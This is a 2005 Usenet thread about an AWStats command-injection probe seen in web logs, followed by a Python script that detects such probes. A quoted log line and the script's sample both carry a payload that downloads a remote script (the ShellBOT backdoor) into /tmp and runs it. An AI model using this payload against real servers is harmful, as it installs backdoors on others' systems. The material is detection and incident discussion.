
Re: A Bitter Linux User in a World Dominated by an Inferior O/S

__/ [Tim Smith] on Thursday 13 October 2005 13:37 \__

> In article <dikn2f$2n3r$1@xxxxxxxxxxxxxxxxx>,
>  Roy Schestowitz <newsgroups@xxxxxxxxxxxxxxx> wrote:
> 
>> I have yet another reason to hate Windows with /passion/. My Linux server
>> has come under heavy attacks by Windows machines that had been hijacked
>> and it's putting my Web host in jeopardy. Motive? Referrer spam that
>> comes with the visits en masse.
> 
> I checked my logs to see if I have any of those, and I'm not getting
> hit.  However, I did notice this interesting item:
> 
> 211.21.77.62 - - [12/Oct/2005:19:24:45 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;kill%20-9%20-1;cd%20/tmp;wget%20http://jimi.springsips.com/~alicia/ice.txt%20;perl%20/tmp/ice.txt;a;echo%20;echo| HTTP/1.1" 404 1021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
> 
> Looks like someone is trying to exploit a problem with awstats on Unix
> systems.  Even though the user agent string claims Windows 98,
> 211.21.77.62 is running Red Hat Linux.
> 
> As of right now, you can run that wget command it is trying to do and
> get the script it wants to run.  It's a version of the ShellBOT
> backdoor, which has been around for a while:
> 
> <http://forum.powweb.com/showthread.php?t=55648>
> 
> It's kind of a nice break amid all the usual Windows malware crap I see
> in my web logs to actually run across some Unix malware that is actually
> in the wild and trying to spread. :-)

*smile*

Speaking of the notorious AWStats exploit, this morning I read a message
from the head sysadmin at the Computer Science Department.

Somebody[1] questionably invoked AWStats from /tmp. It had to be assumed
that the attacker got a copy of the password file in the research domain.
All were forced to urgently change passwords. I occasionally notice
attempts to exploit (non-existing) AWStats on my domain. My AWStats
installation is behind an authentication wall.

Roy

[1] I am guessing an infiltration via SSH, of which there are endless attempts
from the east.

-- 
Roy S. Schestowitz      | "How do I set my laser printer on stun?"
http://Schestowitz.com  |    SuSE Linux    |     PGP-Key: 74572E8E
  2:25pm  up 49 days  2:39,  3 users,  load average: 0.28, 0.52, 0.54
      http://iuron.com - next generation of search paradigms
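A detector for the kind of AWStats probe shown in Tim's log line, added here as an example and not code from anyone in the thread: it parses Apache combined-format lines, percent-decodes the awstats.pl query string by hand, and flags any configdir value carrying shell metacharacters, while recording whether the request hit a real script (status other than 404) or, as in Tim's case, a non-existent one. The sample log lines, IP addresses and the malware hostname are constructed placeholders.

```python
"""Flag AWStats configdir command-injection probes in Apache combined logs."""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Sequences that never belong in a configuration-directory name but are exactly
# what a shell needs to chain commands.
SHELL_META_RE = re.compile(r'[|;`]|\$\(|&&|\|\|')


def parse_line(line):
    """Return the fields of one combined-log line, or None if it does not match."""
    m = LOG_RE.match(line.rstrip('\r\n'))
    return m.groupdict() if m else None


def query_params(query):
    """Split a raw query string on '&' only and percent-decode each key/value.

    Done by hand rather than with urllib's parse_qs so that ';' inside a value
    survives (older Pythons also treat ';' as a pair separator, which would
    chop the payload into harmless-looking pieces).
    """
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def classify(fields):
    """Return a finding for an awstats.pl configdir injection attempt, else None."""
    parts = urlsplit(fields['target'])
    if not parts.path.lower().endswith('/awstats.pl'):
        return None
    for value in query_params(parts.query).get('configdir', []):
        if SHELL_META_RE.search(value):
            return {
                'ip': fields['ip'],
                'ts': fields['ts'],
                'status': fields['status'],
                # 404 means no awstats.pl was there to exploit; anything else
                # means the request reached a real script and needs follow-up.
                'target_existed': fields['status'] != '404',
                'configdir': value,
            }
    return None


def scan(lines):
    """Run every log line through the parser and classifier; return findings."""
    findings = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        finding = classify(fields)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log lines (documentation-range addresses and a placeholder
# hostname, not real indicators).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2005:19:24:45 -0700] "GET /awstats/awstats.pl?'
    'configdir=|echo%20;cd%20/tmp;wget%20http://malware.example/ice.txt%20;'
    'perl%20/tmp/ice.txt;echo| HTTP/1.1" 404 1021 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '198.51.100.7 - - [12/Oct/2005:19:30:02 -0700] "GET /awstats/awstats.pl?'
    'config=example.org&output=main HTTP/1.1" 200 8873 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Oct/2005:19:31:11 -0700] "GET /index.html HTTP/1.1" '
    '200 512 "-" "curl/7.10"',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} "
              f"existed={f['target_existed']} configdir={f['configdir']!r}")
```

Feed it a real access log with `scan(open('access_log'))`; a finding with `target_existed` true is the one to treat as a possible compromise rather than background noise, and the decoded `configdir` value tells you which download host to block and which file under /tmp to look for.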
